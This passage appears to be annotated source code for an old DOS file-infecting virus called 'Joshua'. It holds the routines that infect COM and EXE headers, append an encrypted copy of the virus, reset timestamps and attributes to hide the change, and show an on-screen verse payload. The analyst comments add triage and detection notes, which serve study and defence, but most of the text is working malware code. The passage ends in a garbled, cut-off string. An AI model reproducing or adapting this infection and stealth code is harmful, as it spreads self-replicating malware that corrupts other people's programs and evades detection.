📄 joshua.asm
; Calculate jump offset for header of victim so it will run virus first.
; AX has the filesize. Store new JMP and OFFSET in the buffer.
mov cx,3 ; No. bytes to write in header
sub ax,cx ; Filesize - jmp_offset
mov byte ptr [si-3],0e9h ; Store new JMP command
mov word ptr [si-2],ax ; plus offset
add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET
push ax ; Save it for later
jmp DONE_INFECTION ; We're done!
;*** Subroutine INFECT_EXE ***
; Analyst summary: edits the in-memory copy of the victim's MZ (EXE) header at
; [bp+BUFFER] so the program entry point and stack point at the end of the
; file, where the body is appended later. No file I/O happens in this block;
; it falls through into DONE_INFECTION.
;
; Header fields touched (offsets into BUFFER, as used by the code below):
;   +2  bytes in last 512-byte page     +4  page count
;   +8  header size in paragraphs (read only)
;   +14 initial SS   +16 initial SP     +20 initial IP   +22 initial CS
;
; State handed to DONE_INFECTION: CX = 24 (header bytes to rewrite) and the
; new START_VIRUS offset pushed on the stack.
;
; Triage notes for defenders:
;   - After modification, initial SS equals initial CS and initial SP is the
;     constant ID (defined outside this view). A fixed SP value like this is
;     presumably also the infection marker -- confirm against the check
;     elsewhere in the file.
;   - The original CS:IP and SS:SP are kept in JMPSAVE / STACKSAVE; those are
;     the values needed to restore the header of an infected file.
INFECT_EXE:
; Save original CS:IP and SS:SP.
les ax,dword ptr [bp+BUFFER+20] ; AX = original IP, ES = original CS
mov word ptr [bp+JMPSAVE],ax ; Store IP
mov word ptr [bp+JMPSAVE+2],es ; Store CS
les ax,dword ptr [bp+BUFFER+14] ; AX = original SS, ES = original SP
mov word ptr [bp+STACKSAVE],es ; Store SP
mov word ptr [bp+STACKSAVE+2],ax ; Store SS
; Get the header size in bytes.
mov ax,word ptr [bp+BUFFER+8] ; Get header size
mov cl,4 ; Convert paragraphs to bytes
shl ax,cl ; Multiply by 16
xchg ax,bx ; Put header size in BX
; Get file size.
; DTA+26 is read as a 32-bit size (the DTA is filled by Findfirst / Findnext
; according to the comment above DONE_INFECTION).
les ax,[bp+offset DTA+26] ; Get filesize to
mov dx,es ; DX:AX format
push ax ; Save filesize
push dx
sub ax,bx ; Subtract header size
sbb dx,0 ; from filesize
mov cx,16 ; Convert to SEGMENT:OFFSET
div cx ; form: AX = paragraphs (segment), DX = remainder (offset)
; Store new entry point (CS:IP) in header.
mov word ptr [bp+BUFFER+20],dx; Store IP
mov word ptr [bp+BUFFER+22],ax; Store CS
add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset
mov bx,dx ; Hold it for now
; Store new stack frame (SS:SP) in header.
mov word ptr [bp+BUFFER+14],ax; Store SS (same segment as the new CS)
mov word ptr [bp+BUFFER+16],ID; Store SP (constant ID; see triage notes above)
pop dx ; Get back filesize
pop ax
add ax,END_VIRUS-START_VIRUS ; Add virus size
adc dx,0 ; to filesize
; Convert the new 32-bit size in DX:AX to the MZ "pages / bytes in last page"
; pair: page count = (size >> 9) + 1, remainder = size AND 1FFh.
push ax ; Save AX
mov cl,9 ; Divide AX
shr ax,cl ; by 512
ror dx,cl ; Move the high word's bits into page-count position
stc ; Set carry flag (supplies the +1 for the partial page)
adc dx,ax ; Add with carry
pop ax ; Get back AX
and ah,1 ; Mod 512 (keeps bit 8 of AH; AL is untouched)
; Store new filesize in header.
mov word ptr [bp+BUFFER+4],dx ; Store new filesize (page count)
mov word ptr [bp+BUFFER+2],ax ; Bytes in last page
push cs ; Restore ES (LES above overwrote it)
pop es
mov cx,24 ; No. bytes to write in header
push bx ; Save START_VIRUS offset
; Write virus to victim and restore the file's original timestamp, datestamp,
; and attributes. These values were stored in the DTA by the
; Findfirst / Findnext services.
;
; Analyst summary: shared tail of the COM and EXE paths. On entry CX holds the
; number of header bytes to rewrite and the new START_VIRUS offset is on the
; stack. SET_ATTR, OPEN and APPEND are defined outside this view; what they do
; is inferred from their names and from the comments here.
;
; Forensic / detection notes:
;   - The attribute byte is cleared before the file is opened, then put back
;     from DTA+21. The date and time are reset from DTA+22 / DTA+24. So
;     timestamps and attributes of a modified file look unchanged; compare
;     file size and content hashes against a known-good baseline instead.
;   - KEY is taken from the DOS clock on every pass, so the stored body is
;     expected to differ between infected files. Byte signatures on the body
;     are unlikely to match across samples -- confirm against the crypt
;     routine, which is not shown here.
;   - No carry-flag check follows any INT 21h call in this block. A failed
;     write may therefore leave a host with a rewritten header but no
;     appended body, which is worth considering when assessing damaged files.
DONE_INFECTION:
push cx ; Save no. bytes to write
xor cx,cx ; Clear attributes
call SET_ATTR ; Set attributes
mov al,2 ; DOS open file for read/write
call OPEN ; Open the file
; Write the new header at the beginning of the file.
; NOTE(review): BX is used as the file handle by the INT 21h calls below;
; presumably OPEN leaves it there -- confirm against OPEN.
mov ah,40h ; DOS write to file
pop cx ; Number of bytes to write
lea dx,[bp+BUFFER] ; Point to the bytes to write
int 21h ; Call DOS to do it
; Move to end of file.
mov ax,4202h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx (AX = 4202h is positive)
int 21h ; Call DOS to do it
; Append virus to end of file.
mov ah,2ch ; DOS get time
int 21h ; Call DOS to do it
mov [bp+KEY],dx ; Save sec + 1/100 sec
; as the new KEY
; Build a temporary routine at APPEND, laid out as:
;   53h (PUSH BX) | copy of DECRYPT..START_VIRUS | copy of
;   WRITE_START..WRITE_END | second copy of DECRYPT..START_VIRUS |
;   5Bh C3h (POP BX, RETN)
lea di,[bp+APPEND] ; to the heap
mov cx,START_VIRUS-DECRYPT ; Number of bytes to move
mov al,53h ; Push BX and store it
stosb ; in the append routine
lea si,[bp+DECRYPT] ; Move Crypt routines
push si ; Save SI
push cx ; Save CX
rep movsb ; Transfer the data
lea si,[bp+WRITE_START] ; Now copy the write
mov cx,WRITE_END-WRITE_START ; routine to the heap
rep movsb ; Transfer the data
pop cx ; Get back
pop si ; CX and SI
rep movsb ; Recopy Crypt routine
mov ax,0c35bh ; Tack a POP BX and
stosw ; RETN on the end (stored low byte first: 5Bh, C3h)
pop ax ; New START_VIRUS offset
; The word at DECRYPT+1 is patched only after the copies above were taken, so
; the copies at APPEND still hold the previous value.
mov word ptr [bp+DECRYPT+1],ax; Store new offset
call APPEND ; Write the file
; Restore original creation date and time.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+DTA+22] ; Set time
mov dx,word ptr [bp+DTA+24] ; Set date
int 21h ; Call DOS to do it
; Close the file.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Restore original file attributes.
mov cx,word ptr [bp+DTA+21] ; Get original file attribute
call SET_ATTR ; Set attribute
; NOTE(review): the word discarded here was pushed outside this view; the
; original comment says it is a CALL return address -- confirm against caller.
pop bx ; Take CALL off stack
; ****** B O M B S E C T I O N ******
; Check to see if the virus is ready to activate.
; Put all activation tests and bombs here.
;
; Analyst summary: every activation test under CONDITIONS is commented out in
; this listing, so control falls straight into BOMB. The payload shown is
; display-only: it saves the cursor position, prints 6 lines of VERSE (54
; bytes apart) starting at row 8, column 10, waits for a keypress, restores
; the cursor and jumps to QUIT. No disk or memory modification appears in
; this block.
;
; Behavioural indicator: text appears on screen and the program blocks on
; keyboard input (INT 16h) before the host program runs.
CONDITIONS: ; mov ah,2ah ; DOS get date
; int 21h ; Call DOS to do it
; cmp dx,1001h ; Check for Oct 1st
; jl BOMB_DONE ; Not time yet
; mov ah,2ch ; DOS get time
; int 21h ; Call DOS to do it
; cmp cl,25h ; Check for 25 min past
; jl BOMB_DONE ; Not time yet
BOMB: mov ah,3h ; BIOS find cursor position
mov bh,0 ; Video page 0
int 10h ; Call BIOS to do it
push dx ; Save original Row and Column
mov cx,6 ; Number of lines to print
lea si,[bp+VERSE] ; Location of VERSE
mov dx,080ah ; Row and Column of output (DH = 8, DL = 10)
; Loop invariant: CX = lines left, SI = current line, DX = target row/column.
PRINTLOOP: mov ah,2h ; BIOS set cursor
int 10h ; Set cursor
push dx ; Save Row and Column (DX is reused for the string pointer)
mov ah,9h ; DOS print string
mov dx,si ; Location of VERSE
int 21h ; Call DOS to print it
pop dx ; Get Row and Column
inc dh ; Increment Row
add si,54 ; Go to next line of VERSE
loop PRINTLOOP ; Print all lines
mov ah,00h ; Read character from keybd
int 16h ; Blocks until a key is pressed
pop dx ; Get original Row Column
mov ah,2h ; BIOS set cursor
int 10h ; Call BIOS to do it
BOMB_DONE: jmp QUIT ; Go back to host program
VERSE: db '帜哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪